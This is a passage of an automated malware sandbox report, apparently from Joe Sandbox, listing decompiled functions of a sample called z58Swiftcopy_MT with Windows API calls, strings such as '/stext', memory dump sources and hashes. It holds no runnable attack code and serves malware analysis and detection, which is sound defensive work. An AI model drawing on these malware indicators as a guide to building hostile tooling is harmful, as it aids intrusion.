                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandleSleep
                                                                                                                                                                                                                                      • String ID: }A
                                                                                                                                                                                                                                      • API String ID: 252777609-2138825249
                                                                                                                                                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                                                                                                      Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: freemallocmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3056473165-0
                                                                                                                                                                                                                                      • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                                                                      Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                                                                                                      • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                                                                      Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: BINARY
                                                                                                                                                                                                                                      • API String ID: 2221118986-907554435
                                                                                                                                                                                                                                      • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                                                                      Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                                      Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: .-v
                                                                                                                                                                                                                                      • API String ID: 2081463915-2160125050
                                                                                                                                                                                                                                      • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                                                                                      Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                                                                                                      • Opcode ID: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce69b7b2c0806108a5f6ddf8d326ed6ca623e0dd1ad04f3d7ca3aacd8c235aa4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                                      Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                      • Opcode ID: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64e6e31810cf44f5457cabb26306b8422ff78c6177a83d8139193948e1024434
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                                                                                                                                      Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                                      • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                                      Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,00000000,?,?,00000001,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00406E5A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$??2@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3700833809-0
                                                                                                                                                                                                                                      • Opcode ID: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                                                                      • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a02f897a3927f6a5310245556019bb37ee08e9979723da6ff61ad3578280a48a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                                                                      Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                                                                                                      • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                                      Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004301AD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                                                                                                      • Opcode ID: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                      • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5779d3908ed9fcb9905e682258c98d3473ff673b5cf038f88537d7202db00c15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                                                                                                                                      Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                                                                      Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                                                                                                      • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                                      Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                                                                                                      • Opcode ID: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8a910c41852ee22452d77fb40ce1d6ba1702bea467e5b9a0b1744800db58da8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
